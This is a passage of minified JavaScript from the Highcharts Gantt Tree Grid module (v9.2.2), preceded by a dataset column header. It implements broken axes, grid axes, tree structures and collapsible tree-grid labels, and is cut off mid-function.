text
stringlengths
3
1.05M
/* Highcharts Gantt JS v9.2.2 (2021-08-24) Tree Grid (c) 2016-2021 Jon Arild Nygard License: www.highcharts.com/license */ 'use strict';(function(f){"object"===typeof module&&module.exports?(f["default"]=f,module.exports=f):"function"===typeof define&&define.amd?define("highcharts/modules/treegrid",["highcharts"],function(A){f(A);f.Highcharts=A;return f}):f("undefined"!==typeof Highcharts?Highcharts:void 0)})(function(f){function A(f,t,y,v){f.hasOwnProperty(t)||(f[t]=v.apply(null,y))}f=f?f._modules:{};A(f,"Core/Axis/BrokenAxis.js",[f["Extensions/Stacking.js"],f["Core/Utilities.js"]],function(f,t){var y=t.addEvent,v=t.find, z=t.fireEvent,k=t.isArray,p=t.isNumber,u=t.pick,m;(function(a){function m(){"undefined"!==typeof this.brokenAxis&&this.brokenAxis.setBreaks(this.options.breaks,!1)}function q(){this.brokenAxis&&this.brokenAxis.hasBreaks&&(this.options.ordinal=!1)}function D(){var g=this.brokenAxis;if(g&&g.hasBreaks){for(var E=this.tickPositions,c=this.tickPositions.info,a=[],d=0;d<E.length;d++)g.isInAnyBreak(E[d])||a.push(E[d]);this.tickPositions=a;this.tickPositions.info=c}}function t(){this.brokenAxis||(this.brokenAxis= new e(this))}function C(){var g=this.options.connectNulls,c=this.points,a=this.xAxis,e=this.yAxis;if(this.isDirty)for(var d=c.length;d--;){var b=c[d],n=!(null===b.y&&!1===g)&&(a&&a.brokenAxis&&a.brokenAxis.isInAnyBreak(b.x,!0)||e&&e.brokenAxis&&e.brokenAxis.isInAnyBreak(b.y,!0));b.visible=n?!1:!1!==b.options.visible}}function b(){this.drawBreaks(this.xAxis,["x"]);this.drawBreaks(this.yAxis,u(this.pointArrayMap,["y"]))}function c(g,c){var a=this,E=a.points,d,e,n,l;if(g&&g.brokenAxis&&g.brokenAxis.hasBreaks){var b= g.brokenAxis;c.forEach(function(c){d=b&&b.breakArray||[];e=g.isXAxis?g.min:u(a.options.threshold,g.min);E.forEach(function(a){l=u(a["stack"+c.toUpperCase()],a[c]);d.forEach(function(d){if(p(e)&&p(l)){n=!1;if(e<d.from&&l>d.to||e>d.from&&l<d.from)n="pointBreak";else if(e<d.from&&l>d.from&&l<d.to||e>d.from&&l>d.to&&l<d.from)n="pointInBreak";n&&z(g,n,{point:a,brk:d})}})})})}}function r(){var g=this.currentDataGrouping,c=g&&g.gapSize;g=this.points.slice();var a=this.yAxis,e=this.options.gapSize,d=g.length- 1,b;if(e&&0<d)for("value"!==this.options.gapUnit&&(e*=this.basePointRange),c&&c>e&&c>=this.basePointRange&&(e=c),b=void 0;d--;)b&&!1!==b.visible||(b=g[d+1]),c=g[d],!1!==b.visible&&!1!==c.visible&&(b.x-c.x>e&&(b=(c.x+b.x)/2,g.splice(d+1,0,{isNull:!0,x:b}),a.stacking&&this.options.stacking&&(b=a.stacking.stacks[this.stackKey][b]=new f(a,a.options.stackLabels,!1,b,this.stack),b.total=0)),b=c);return this.getGraphPath(g)}var w=[];a.compose=function(g,a){-1===w.indexOf(g)&&(w.push(g),g.keepProps.push("brokenAxis"), y(g,"init",t),y(g,"afterInit",m),y(g,"afterSetTickPositions",D),y(g,"afterSetOptions",q));if(-1===w.indexOf(a)){w.push(a);var e=a.prototype;e.drawBreaks=c;e.gappedPath=r;y(a,"afterGeneratePoints",C);y(a,"afterRender",b)}return g};var e=function(){function c(c){this.hasBreaks=!1;this.axis=c}c.isInBreak=function(c,a){var b=c.repeat||Infinity,d=c.from,e=c.to-c.from;a=a>=d?(a-d)%b:b-(d-a)%b;return c.inclusive?a<=e:a<e&&0!==a};c.lin2Val=function(a){var b=this.brokenAxis;b=b&&b.breakArray;if(!b||!p(a))return a; var e;for(e=0;e<b.length;e++){var d=b[e];if(d.from>=a)break;else d.to<a?a+=d.len:c.isInBreak(d,a)&&(a+=d.len)}return a};c.val2Lin=function(a){var b=this.brokenAxis;b=b&&b.breakArray;if(!b||!p(a))return a;var e=a,d;for(d=0;d<b.length;d++){var g=b[d];if(g.to<=a)e-=g.len;else if(g.from>=a)break;else if(c.isInBreak(g,a)){e-=a-g.from;break}}return e};c.prototype.findBreakAt=function(c,a){return v(a,function(a){return a.from<c&&c<a.to})};c.prototype.isInAnyBreak=function(a,b){var e=this.axis,d=e.options.breaks|| [],g=d.length,n;if(g&&p(a)){for(;g--;)if(c.isInBreak(d[g],a)){var l=!0;n||(n=u(d[g].showPoints,!e.isXAxis))}var w=l&&b?l&&!n:l}return w};c.prototype.setBreaks=function(a,b){var e=this,d=e.axis,g=k(a)&&!!a.length;d.isDirty=e.hasBreaks!==g;e.hasBreaks=g;d.options.breaks=d.userOptions.breaks=a;d.forceRedraw=!0;d.series.forEach(function(a){a.isDirty=!0});g||d.val2lin!==c.val2Lin||(delete d.val2lin,delete d.lin2val);g&&(d.userOptions.ordinal=!1,d.lin2val=c.lin2Val,d.val2lin=c.val2Lin,d.setExtremes=function(a, c,b,g,w){if(e.hasBreaks){for(var l=this.options.breaks||[],n;n=e.findBreakAt(a,l);)a=n.to;for(;n=e.findBreakAt(c,l);)c=n.from;c<a&&(c=a)}d.constructor.prototype.setExtremes.call(this,a,c,b,g,w)},d.setAxisTranslation=function(){d.constructor.prototype.setAxisTranslation.call(this);e.unitLength=void 0;if(e.hasBreaks){var a=d.options.breaks||[],b=[],g=[],w=u(d.pointRangePadding,0),r=0,m,k=d.userMin||d.min,f=d.userMax||d.max,q;a.forEach(function(h){m=h.repeat||Infinity;p(k)&&p(f)&&(c.isInBreak(h,k)&& (k+=h.to%m-k%m),c.isInBreak(h,f)&&(f-=f%m-h.from%m))});a.forEach(function(x){h=x.from;m=x.repeat||Infinity;if(p(k)&&p(f)){for(;h-m>k;)h-=m;for(;h<k;)h+=m;for(q=h;q<f;q+=m)b.push({value:q,move:"in"}),b.push({value:q+x.to-x.from,move:"out",size:x.breakSize})}});b.sort(function(h,x){return h.value===x.value?("in"===h.move?0:1)-("in"===x.move?0:1):h.value-x.value});var x=0;var h=k;b.forEach(function(a){x+="in"===a.move?1:-1;1===x&&"in"===a.move&&(h=a.value);0===x&&p(h)&&(g.push({from:h,to:a.value,len:a.value- h-(a.size||0)}),r+=a.value-h-(a.size||0))});e.breakArray=g;p(k)&&p(f)&&p(d.min)&&(e.unitLength=f-k-r+w,z(d,"afterBreaks"),d.staticScale?d.transA=d.staticScale:e.unitLength&&(d.transA*=(f-d.min+w)/e.unitLength),w&&(d.minPixelPadding=d.transA*(d.minPointOffset||0)),d.min=k,d.max=f)}});u(b,!0)&&d.chart.redraw()};return c}();a.Additions=e})(m||(m={}));return m});A(f,"Core/Axis/GridAxis.js",[f["Core/Axis/Axis.js"],f["Core/Axis/AxisDefaults.js"],f["Core/Globals.js"],f["Core/Utilities.js"]],function(f,t, y,v){var z=y.dateFormats,k=v.addEvent,p=v.defined,u=v.erase,m=v.find,a=v.isArray,B=v.isNumber,q=v.merge,D=v.pick,F=v.timeUnits,C=v.wrap,b;(function(c){function b(x,h){var a={width:0,height:0};h.forEach(function(h){h=x[h];if(v.isObject(h,!0)){var c=v.isObject(h.label,!0)?h.label:{};h=c.getBBox?c.getBBox().height:0;c.textStr&&!B(c.textPxLength)&&(c.textPxLength=c.getBBox().width);var b=B(c.textPxLength)?Math.round(c.textPxLength):0;c.textStr&&(b=Math.round(c.getBBox().width));a.height=Math.max(h,a.height); a.width=Math.max(b,a.width)}});"treegrid"===this.options.type&&this.treeGrid&&this.treeGrid.mapOfPosToGridNode&&(a.width+=this.options.labels.indentation*((this.treeGrid.mapOfPosToGridNode[-1].height||0)-1));return a}function w(){var a=this.grid;(a&&a.columns||[]).forEach(function(h){h.getOffset()})}function e(a){if(!0===(this.options.grid||{}).enabled){var h=this.axisTitle,x=this.height,b=this.horiz,e=this.left,d=this.offset,g=this.opposite,l=this.options,n=this.top,w=this.width,r=this.tickSize(), m=h&&h.getBBox().width,k=l.title.x,f=l.title.y,G=D(l.title.margin,b?5:10);h=this.chart.renderer.fontMetrics(l.title.style.fontSize,h).f;r=(b?n+x:e)+(b?1:-1)*(g?-1:1)*(r?r[0]/2:0)+(this.side===c.Side.bottom?h:0);a.titlePosition.x=b?e-(m||0)/2-G+k:r+(g?w:0)+d+k;a.titlePosition.y=b?r-(g?x:0)+(g?h:-h)/2+d+f:n-G+f}}function g(){var a=this.chart,h=this.options.grid;h=void 0===h?{}:h;var c=this.userOptions;if(h.enabled){var b=this.options;b.labels.align=D(b.labels.align,"center");this.categories||(b.showLastLabel= !1);this.labelRotation=0;b.labels.rotation=0}if(h.columns){b=this.grid.columns=[];for(var e=this.grid.columnIndex=0;++e<h.columns.length;){var d=q(c,h.columns[h.columns.length-e-1],{linkedTo:0,type:"category",scrollbar:{enabled:!1}});delete d.grid.columns;d=new f(this.chart,d);d.grid.isColumn=!0;d.grid.columnIndex=e;u(a.axes,d);u(a[this.coll],d);b.push(d)}}}function E(){var a=this.grid,h=this.options;if(!0===(h.grid||{}).enabled){var b=this.min||0,e=this.max||0;this.maxLabelDimensions=this.getMaxLabelDimensions(this.ticks, this.tickPositions);this.rightWall&&this.rightWall.destroy();if(this.grid&&this.grid.isOuterAxis()&&this.axisLine){var d=h.lineWidth;if(d){d=this.getLinePath(d);var g=d[0],l=d[1],n=((this.tickSize("tick")||[1])[0]-1)*(this.side===c.Side.top||this.side===c.Side.left?-1:1);"M"===g[0]&&"L"===l[0]&&(this.horiz?(g[2]+=n,l[2]+=n):(g[1]+=n,l[1]+=n));!this.horiz&&this.chart.marginRight&&(g=[g,["L",this.left,g[2]||0]],n=["L",this.chart.chartWidth-this.chart.marginRight,this.toPixels(e+this.tickmarkOffset)], l=[["M",l[1]||0,this.toPixels(e+this.tickmarkOffset)],n],this.grid.upperBorder||0===b%1||(this.grid.upperBorder=this.grid.renderBorder(g)),this.grid.upperBorder&&(this.grid.upperBorder.attr({stroke:h.lineColor,"stroke-width":h.lineWidth}),this.grid.upperBorder.animate({d:g})),this.grid.lowerBorder||0===e%1||(this.grid.lowerBorder=this.grid.renderBorder(l)),this.grid.lowerBorder&&(this.grid.lowerBorder.attr({stroke:h.lineColor,"stroke-width":h.lineWidth}),this.grid.lowerBorder.animate({d:l})));this.grid.axisLineExtra? (this.grid.axisLineExtra.attr({stroke:h.lineColor,"stroke-width":h.lineWidth}),this.grid.axisLineExtra.animate({d:d})):this.grid.axisLineExtra=this.grid.renderBorder(d);this.axisLine[this.showAxis?"show":"hide"](!0)}}(a&&a.columns||[]).forEach(function(a){a.render()});if(!this.horiz&&this.chart.hasRendered&&(this.scrollbar||this.linkedParent&&this.linkedParent.scrollbar)){a=this.tickmarkOffset;h=this.tickPositions[this.tickPositions.length-1];d=this.tickPositions[0];for(l=void 0;(l=this.hiddenLabels.pop())&& l.element;)l.show();(l=this.ticks[d].label)&&(b-d>a?this.hiddenLabels.push(l.hide()):l.show());(l=this.ticks[h].label)&&(h-e>a?this.hiddenLabels.push(l.hide()):l.show());(b=this.ticks[h].mark)&&(h-e<a&&0<h-e&&this.ticks[h].isLast?b.hide():this.ticks[h-1]&&b.show())}}}function z(){var a=this.tickPositions&&this.tickPositions.info,h=this.options,c=this.userOptions.labels||{};(h.grid||{}).enabled&&(this.horiz?(this.series.forEach(function(a){a.options.pointRange=0}),a&&h.dateTimeLabelFormats&&h.labels&& !p(c.align)&&(!1===h.dateTimeLabelFormats[a.unitName].range||1<a.count)&&(h.labels.align="left",p(c.x)||(h.labels.x=3))):"treegrid"!==this.options.type&&this.grid&&this.grid.columns&&(this.minPointOffset=this.tickInterval))}function H(a){var h=this.options;a=a.userOptions;var c=h&&v.isObject(h.grid,!0)?h.grid:{};if(!0===c.enabled){var b=q(!0,{className:"highcharts-grid-axis "+(a.className||""),dateTimeLabelFormats:{hour:{list:["%H:%M","%H"]},day:{list:["%A, %e. %B","%a, %e. %b","%E"]},week:{list:["Week %W", "W%W"]},month:{list:["%B","%b","%o"]}},grid:{borderWidth:1},labels:{padding:2,style:{fontSize:"13px"}},margin:0,title:{text:null,reserveSpace:!1,rotation:0},units:[["millisecond",[1,10,100]],["second",[1,10]],["minute",[1,5,15]],["hour",[1,6]],["day",[1]],["week",[1]],["month",[1]],["year",null]]},a);"xAxis"===this.coll&&(p(a.linkedTo)&&!p(a.tickPixelInterval)&&(b.tickPixelInterval=350),p(a.tickPixelInterval)||!p(a.linkedTo)||p(a.tickPositioner)||p(a.tickInterval)||(b.tickPositioner=function(a,h){var c= this.linkedParent&&this.linkedParent.tickPositions&&this.linkedParent.tickPositions.info;if(c){for(var x=b.units||[],d=void 0,e=void 0,l=void 0,g=0;g<x.length;g++)if(x[g][0]===c.unitName){d=g;break}x[d+1]?(l=x[d+1][0],e=(x[d+1][1]||[1])[0]):"year"===c.unitName&&(l="year",e=10*c.count);c=F[l];this.tickInterval=c*e;return this.getTimeTicks({unitRange:c,count:e,unitName:l},a,h,this.options.startOfWeek)}}));q(!0,this.options,b);this.horiz&&(h.minPadding=D(a.minPadding,0),h.maxPadding=D(a.maxPadding,0)); B(h.grid.borderWidth)&&(h.tickWidth=h.lineWidth=c.borderWidth)}}function d(a){a=(a=a.userOptions)&&a.grid||{};var h=a.columns;a.enabled&&h&&q(!0,this.options,h[h.length-1])}function J(){(this.grid.columns||[]).forEach(function(a){a.setScale()})}function n(c){var h=t.defaultLeftAxisOptions,b=this.horiz,d=this.maxLabelDimensions,e=this.options.grid;e=void 0===e?{}:e;e.enabled&&d&&(h=2*Math.abs(h.labels.x),b=b?e.cellHeight||h+d.height:h+d.width,a(c.tickSize)?c.tickSize[0]=b:c.tickSize=[b,0])}function l(){this.axes.forEach(function(a){(a.grid&& a.grid.columns||[]).forEach(function(a){a.setAxisSize();a.setAxisTranslation()})})}function K(a){var h=this.grid;(h.columns||[]).forEach(function(h){h.destroy(a.keepEvents)});h.columns=void 0}function G(a){a=a.userOptions||{};var h=a.grid||{};h.enabled&&p(h.borderColor)&&(a.tickColor=a.lineColor=h.borderColor);this.grid||(this.grid=new I(this));this.hiddenLabels=[]}function L(a){var h=this.label,b=this.axis,e=b.reversed,d=b.chart,l=b.options.grid||{},g=b.options.labels,x=g.align,n=c.Side[b.side], w=a.tickmarkOffset,r=b.tickPositions,k=this.pos-w;r=B(r[a.index+1])?r[a.index+1]-w:(b.max||0)+w;var m=b.tickSize("tick");w=m?m[0]:0;m=m?m[1]/2:0;if(!0===l.enabled){if("top"===n){l=b.top+b.offset;var f=l-w}else"bottom"===n?(f=d.chartHeight-b.bottom+b.offset,l=f+w):(l=b.top+b.len-(b.translate(e?r:k)||0),f=b.top+b.len-(b.translate(e?k:r)||0));"right"===n?(n=d.chartWidth-b.right+b.offset,e=n+w):"left"===n?(e=b.left+b.offset,n=e-w):(n=Math.round(b.left+(b.translate(e?r:k)||0))-m,e=Math.min(Math.round(b.left+ (b.translate(e?k:r)||0))-m,b.left+b.len));this.slotWidth=e-n;a.pos.x="left"===x?n:"right"===x?e:n+(e-n)/2;a.pos.y=f+(l-f)/2;d=d.renderer.fontMetrics(g.style.fontSize,h&&h.element);h=h?h.getBBox().height:0;g.useHTML?a.pos.y+=d.b+-(h/2):(h=Math.round(h/d.h),a.pos.y+=(d.b-(d.h-d.f))/2+-((h-1)*d.h/2));a.pos.x+=b.horiz&&g.x||0}}function M(a){var b=a.axis,c=a.value;if(b.options.grid&&b.options.grid.enabled){var e=b.tickPositions,d=(b.linkedParent||b).series[0],l=c===e[0];e=c===e[e.length-1];var g=d&&m(d.options.data, function(a){return a[b.isXAxis?"x":"y"]===c}),x=void 0;g&&d.is("gantt")&&(x=q(g),y.seriesTypes.gantt.prototype.pointClass.setGanttPointAliases(x));a.isFirst=l;a.isLast=e;a.point=x}}function N(){var a=this.options,b=this.categories,c=this.tickPositions,e=c[0],d=c[c.length-1],l=this.linkedParent&&this.linkedParent.min||this.min,g=this.linkedParent&&this.linkedParent.max||this.max,n=this.tickInterval;!0!==(a.grid||{}).enabled||b||!this.horiz&&!this.isLinked||(e<l&&e+n>l&&!a.startOnTick&&(c[0]=l),d>g&& d-n<g&&!a.endOnTick&&(c[c.length-1]=g))}function O(a){var b=this.options.grid;return!0===(void 0===b?{}:b).enabled&&this.categories?this.tickInterval:a.apply(this,Array.prototype.slice.call(arguments,1))}(function(a){a[a.top=0]="top";a[a.right=1]="right";a[a.bottom=2]="bottom";a[a.left=3]="left"})(c.Side||(c.Side={}));c.compose=function(a,c,r){-1===a.keepProps.indexOf("grid")&&(a.keepProps.push("grid"),a.prototype.getMaxLabelDimensions=b,C(a.prototype,"unsquish",O),k(a,"init",G),k(a,"afterGetOffset", w),k(a,"afterGetTitlePosition",e),k(a,"afterInit",g),k(a,"afterRender",E),k(a,"afterSetAxisTranslation",z),k(a,"afterSetOptions",H),k(a,"afterSetOptions",d),k(a,"afterSetScale",J),k(a,"afterTickSize",n),k(a,"trimTicks",N),k(a,"destroy",K));k(c,"afterSetChartSize",l);k(r,"afterGetLabelPosition",L);k(r,"labelFormat",M);return a};var I=function(){function a(a){this.axis=a}a.prototype.isOuterAxis=function(){var a=this.axis,b=a.grid.columnIndex,c=a.linkedParent&&a.linkedParent.grid.columns||a.grid.columns, e=b?a.linkedParent:a,d=-1,l=0;a.chart[a.coll].forEach(function(b,c){b.side!==a.side||b.options.isInternal||(l=c,b===e&&(d=c))});return l===d&&(B(b)?c.length===b:!0)};a.prototype.renderBorder=function(a){var b=this.axis,c=b.chart.renderer,e=b.options;a=c.path(a).addClass("highcharts-axis-line").add(b.axisBorder);c.styledMode||a.attr({stroke:e.lineColor,"stroke-width":e.lineWidth,zIndex:7});return a};return a}();c.Additions=I})(b||(b={}));z.E=function(a){return this.dateFormat("%a",a,!0).charAt(0)}; z.W=function(a){a=new this.Date(a);var b=(this.get("Day",a)+6)%7,c=new this.Date(a.valueOf());this.set("Date",c,this.get("Date",a)-b+3);b=new this.Date(this.get("FullYear",c),0,1);4!==this.get("Day",b)&&(this.set("Month",a,0),this.set("Date",a,1+(11-this.get("Day",b))%7));return(1+Math.floor((c.valueOf()-b.valueOf())/6048E5)).toString()};"";return b});A(f,"Gantt/Tree.js",[f["Core/Utilities.js"]],function(f){var t=f.extend,y=f.isNumber,v=f.pick,z=function(f,k){var m=f.reduce(function(a,f){var m=v(f.parent, "");"undefined"===typeof a[m]&&(a[m]=[]);a[m].push(f);return a},{});Object.keys(m).forEach(function(a,f){var q=m[a];""!==a&&-1===k.indexOf(a)&&(q.forEach(function(a){f[""].push(a)}),delete f[a])});return m},k=function(f,u,m,a,B,q){var p=0,z=0,C=q&&q.after,b=q&&q.before;u={data:a,depth:m-1,id:f,level:m,parent:u};var c,r;"function"===typeof b&&b(u,q);b=(B[f]||[]).map(function(a){var b=k(a.id,f,m+1,a,B,q),g=a.start;a=!0===a.milestone?g:a.end;c=!y(c)||g<c?g:c;r=!y(r)||a>r?a:r;p=p+1+b.descendants;z=Math.max(b.height+ 1,z);return b});a&&(a.start=v(a.start,c),a.end=v(a.end,r));t(u,{children:b,descendants:p,height:z});"function"===typeof C&&C(u,q);return u};return{getListOfParents:z,getNode:k,getTree:function(f,u){var m=f.map(function(a){return a.id});f=z(f,m);return k("",null,1,null,f,u)}}});A(f,"Core/Axis/TreeGridTick.js",[f["Core/Color/Palette.js"],f["Core/Utilities.js"]],function(f,t){var y=t.addEvent,v=t.isObject,z=t.isNumber,k=t.pick,p=t.wrap,u;(function(m){function a(){this.treeGrid||(this.treeGrid=new C(this))} function u(a,c){a=a.treeGrid;var b=!a.labelIcon,m=c.renderer,e=c.xy,g=c.options,q=g.width||0,u=g.height||0,p=e.x-q/2-(g.padding||0);e=e.y-u/2;var d=c.collapsed?90:180,t=c.show&&z(e),n=a.labelIcon;n||(a.labelIcon=n=m.path(m.symbols[g.type](g.x||0,g.y||0,q,u)).addClass("highcharts-label-icon").add(c.group));n.attr({y:t?0:-9999});m.styledMode||n.attr({cursor:"pointer",fill:k(c.color,f.neutralColor60),"stroke-width":1,stroke:g.lineColor,strokeWidth:g.lineWidth||0});n[b?"attr":"animate"]({translateX:p, translateY:e,rotation:d})}function q(a,c,f,m,e,g,q,u,p){var b=k(this.options&&this.options.labels,g);g=this.pos;var r=this.axis,n="treegrid"===r.options.type;a=a.apply(this,[c,f,m,e,b,q,u,p]);n&&(c=b&&v(b.symbol,!0)?b.symbol:{},b=b&&z(b.indentation)?b.indentation:0,g=(g=(r=r.treeGrid.mapOfPosToGridNode)&&r[g])&&g.depth||1,a.x+=(c.width||0)+2*(c.padding||0)+(g-1)*b);return a}function t(a){var b=this,f=b.pos,m=b.axis,e=b.label,g=m.treeGrid.mapOfPosToGridNode,q=m.options,p=k(b.options&&b.options.labels, q&&q.labels),t=p&&v(p.symbol,!0)?p.symbol:{},d=(g=g&&g[f])&&g.depth;q="treegrid"===q.type;var B=-1<m.tickPositions.indexOf(f);f=m.chart.styledMode;q&&g&&e&&e.element&&e.addClass("highcharts-treegrid-node-level-"+d);a.apply(b,Array.prototype.slice.call(arguments,1));q&&e&&e.element&&g&&g.descendants&&0<g.descendants&&(m=m.treeGrid.isCollapsed(g),u(b,{color:!f&&e.styles&&e.styles.color||"",collapsed:m,group:e.parentGroup,options:t,renderer:e.renderer,show:B,xy:e.xy}),t="highcharts-treegrid-node-"+(m? "expanded":"collapsed"),e.addClass("highcharts-treegrid-node-"+(m?"collapsed":"expanded")).removeClass(t),f||e.css({cursor:"pointer"}),[e,b.treeGrid.labelIcon].forEach(function(a){a&&!a.attachedTreeGridEvents&&(y(a.element,"mouseover",function(){e.addClass("highcharts-treegrid-node-active");e.renderer.styledMode||e.css({textDecoration:"underline"})}),y(a.element,"mouseout",function(){var a=v(p.style)?p.style:{};e.removeClass("highcharts-treegrid-node-active");e.renderer.styledMode||e.css({textDecoration:a.textDecoration})}), y(a.element,"click",function(){b.treeGrid.toggleCollapse()}),a.attachedTreeGridEvents=!0)}))}var F=!1;m.compose=function(b){F||(y(b,"init",a),p(b.prototype,"getLabelPosition",q),p(b.prototype,"renderLabel",t),b.prototype.collapse=function(a){this.treeGrid.collapse(a)},b.prototype.expand=function(a){this.treeGrid.expand(a)},b.prototype.toggleCollapse=function(a){this.treeGrid.toggleCollapse(a)},F=!0)};var C=function(){function a(a){this.tick=a}a.prototype.collapse=function(a){var b=this.tick,c=b.axis, e=c.brokenAxis;e&&c.treeGrid.mapOfPosToGridNode&&(b=c.treeGrid.collapse(c.treeGrid.mapOfPosToGridNode[b.pos]),e.setBreaks(b,k(a,!0)))};a.prototype.expand=function(a){var b=this.tick,c=b.axis,e=c.brokenAxis;e&&c.treeGrid.mapOfPosToGridNode&&(b=c.treeGrid.expand(c.treeGrid.mapOfPosToGridNode[b.pos]),e.setBreaks(b,k(a,!0)))};a.prototype.toggleCollapse=function(a){var b=this.tick,c=b.axis,e=c.brokenAxis;e&&c.treeGrid.mapOfPosToGridNode&&(b=c.treeGrid.toggleCollapse(c.treeGrid.mapOfPosToGridNode[b.pos]), e.setBreaks(b,k(a,!0)))};return a}();m.Additions=C})(u||(u={}));return u});A(f,"Mixins/TreeSeries.js",[f["Core/Color/Color.js"],f["Core/Utilities.js"]],function(f,t){var y=t.extend,v=t.isArray,z=t.isNumber,k=t.isObject,p=t.merge,u=t.pick;return{getColor:function(m,a){var k=a.index,q=a.mapOptionsToLevel,p=a.parentColor,t=a.parentColorIndex,v=a.series,b=a.colors,c=a.siblings,r=v.points,w=v.chart.options.chart,e;if(m){r=r[m.i];m=q[m.level]||{};if(q=r&&m.colorByPoint){var g=r.index%(b?b.length:w.colorCount); var y=b&&b[g]}if(!v.chart.styledMode){b=r&&r.options.color;w=m&&m.color;if(e=p)e=(e=m&&m.colorVariation)&&"brightness"===e.key?f.parse(p).brighten(k/c*e.to).get():p;e=u(b,w,y,e,v.color)}var z=u(r&&r.options.colorIndex,m&&m.colorIndex,g,t,a.colorIndex)}return{color:e,colorIndex:z}},getLevelOptions:function(f){var a=null;if(k(f)){a={};var m=z(f.from)?f.from:1;var q=f.levels;var t={};var u=k(f.defaults)?f.defaults:{};v(q)&&(t=q.reduce(function(a,b){if(k(b)&&z(b.level)){var c=p({},b);var f="boolean"=== typeof c.levelIsConstant?c.levelIsConstant:u.levelIsConstant;delete c.levelIsConstant;delete c.level;b=b.level+(f?0:m-1);k(a[b])?y(a[b],c):a[b]=c}return a},{}));q=z(f.to)?f.to:1;for(f=0;f<=q;f++)a[f]=p({},u,k(t[f])?t[f]:{})}return a},setTreeValues:function q(a,f){var k=f.before,p=f.idRoot,t=f.mapIdToNode[p],b=f.points[a.i],c=b&&b.options||{},r=0,w=[];a.levelDynamic=a.level-(("boolean"===typeof f.levelIsConstant?f.levelIsConstant:1)?0:t.level);a.name=u(b&&b.name,"");a.visible=p===a.id||("boolean"=== typeof f.visible?f.visible:!1);"function"===typeof k&&(a=k(a,f));a.children.forEach(function(b,c){var e=y({},f);y(e,{index:c,siblings:a.children.length,visible:a.visible});b=q(b,e);w.push(b);b.visible&&(r+=b.val)});k=u(c.value,r);a.visible=0<=k&&(0<r||a.visible);a.children=w;a.childrenTotal=r;a.isLeaf=a.visible&&!r;a.val=k;return a},updateRootId:function(a){if(k(a)){var f=k(a.options)?a.options:{};f=u(a.rootNode,f.rootId,"");k(a.userOptions)&&(a.userOptions.rootId=f);a.rootNode=f}return f}}});A(f, "Core/Axis/TreeGridAxis.js",[f["Core/Axis/BrokenAxis.js"],f["Core/Axis/GridAxis.js"],f["Gantt/Tree.js"],f["Core/Axis/TreeGridTick.js"],f["Mixins/TreeSeries.js"],f["Core/Utilities.js"]],function(f,t,y,v,z,k){var p=z.getLevelOptions,u=k.addEvent,m=k.find,a=k.fireEvent,B=k.isArray,q=k.isObject,A=k.isString,F=k.merge,C=k.pick,b=k.wrap,c;(function(c){function k(a,b){var c=a.collapseEnd||0;a=a.collapseStart||0;c>=b&&(a-=.5);return{from:a,to:c,showPoints:!1}}function e(a,b,c){var e=[],d=[],f={},l="boolean"=== typeof b?b:!1,g={},k=-1;a=y.getTree(a,{after:function(a){a=g[a.pos];var b=0,c=0;a.children.forEach(function(a){c+=(a.descendants||0)+1;b=Math.max((a.height||0)+1,b)});a.descendants=c;a.height=b;a.collapsed&&d.push(a)},before:function(a){var b=q(a.data,!0)?a.data:{},c=A(b.name)?b.name:"",d=f[a.parent];d=q(d,!0)?g[d.pos]:null;var n=function(a){return a.name===c},p;l&&q(d,!0)&&(p=m(d.children,n))?(n=p.pos,p.nodes.push(a)):n=k++;g[n]||(g[n]=p={depth:d?d.depth+1:0,name:c,id:b.id,nodes:[a],children:[], pos:n},-1!==n&&e.push(c),q(d,!0)&&d.children.push(p));A(a.id)&&(f[a.id]=a);p&&!0===b.collapsed&&(p.collapsed=!0);a.pos=n}});g=function(a,b){var c=function(a,d,e){var f=d+(-1===d?0:b-1),g=(f-d)/2,l=d+g;a.nodes.forEach(function(a){var b=a.data;q(b,!0)&&(b.y=d+(b.seriesIndex||0),delete b.seriesIndex);a.pos=l});e[l]=a;a.pos=l;a.tickmarkOffset=g+.5;a.collapseStart=f+.5;a.children.forEach(function(a){c(a,f+1,e);f=(a.collapseEnd||0)-.5});a.collapseEnd=f+.5;return e};return c(a["-1"],-1,{})}(g,c);return{categories:e, mapOfIdToNode:f,mapOfPosToGridNode:g,collapsedNodes:d,tree:a}}function g(a){a.target.axes.filter(function(a){return"treegrid"===a.options.type}).forEach(function(b){var c=b.options||{},d=c.labels,f=c.uniqueNames;c=c.max;var g=0;if(!b.treeGrid.mapOfPosToGridNode||b.series.some(function(a){return!a.hasRendered||a.isDirtyData||a.isDirty})){var l=b.series.reduce(function(a,b){b.visible&&((b.options.data||[]).forEach(function(c){b.options.keys&&b.options.keys.length&&(c=b.pointClass.prototype.optionsToObject.call({series:b}, c),b.pointClass.setGanttPointAliases(c));q(c,!0)&&(c.seriesIndex=g,a.push(c))}),!0===f&&g++);return a},[]);if(c&&l.length<c)for(var n=l.length;n<=c;n++)l.push({name:n+"\u200b"});c=e(l,f||!1,!0===f?g:1);b.categories=c.categories;b.treeGrid.mapOfPosToGridNode=c.mapOfPosToGridNode;b.hasNames=!0;b.treeGrid.tree=c.tree;b.series.forEach(function(a){var b=(a.options.data||[]).map(function(b){B(b)&&a.options.keys&&a.options.keys.length&&l.forEach(function(a){0<=b.indexOf(a.x)&&0<=b.indexOf(a.x2)&&(b=a)}); return q(b,!0)?F(b):b});a.visible&&a.setData(b,!1)});b.treeGrid.mapOptionsToLevel=p({defaults:d,from:1,levels:d&&d.levels,to:b.treeGrid.tree&&b.treeGrid.tree.height});"beforeRender"===a.type&&(b.treeGrid.collapsedNodes=c.collapsedNodes)}})}function r(a,b){var c=this.treeGrid.mapOptionsToLevel||{},e=this.ticks,f=e[b],g;if("treegrid"===this.options.type&&this.treeGrid.mapOfPosToGridNode){var l=this.treeGrid.mapOfPosToGridNode[b];(c=c[l.depth])&&(g={labels:c});!f&&d?e[b]=new d(this,b,void 0,void 0,{category:l.name, tickmarkOffset:l.tickmarkOffset,options:g}):(f.parameters.category=l.name,f.options=g,f.addLabel())}else a.apply(this,Array.prototype.slice.call(arguments,1))}function z(a,b,c){var d=this,f="treegrid"===c.type;d.treeGrid||(d.treeGrid=new D(d));f&&(u(b,"beforeRender",g),u(b,"beforeRedraw",g),u(b,"addSeries",function(a){a.options.data&&(a=e(a.options.data,c.uniqueNames||!1,1),d.treeGrid.collapsedNodes=(d.treeGrid.collapsedNodes||[]).concat(a.collapsedNodes))}),u(d,"foundExtremes",function(){d.treeGrid.collapsedNodes&& d.treeGrid.collapsedNodes.forEach(function(a){var 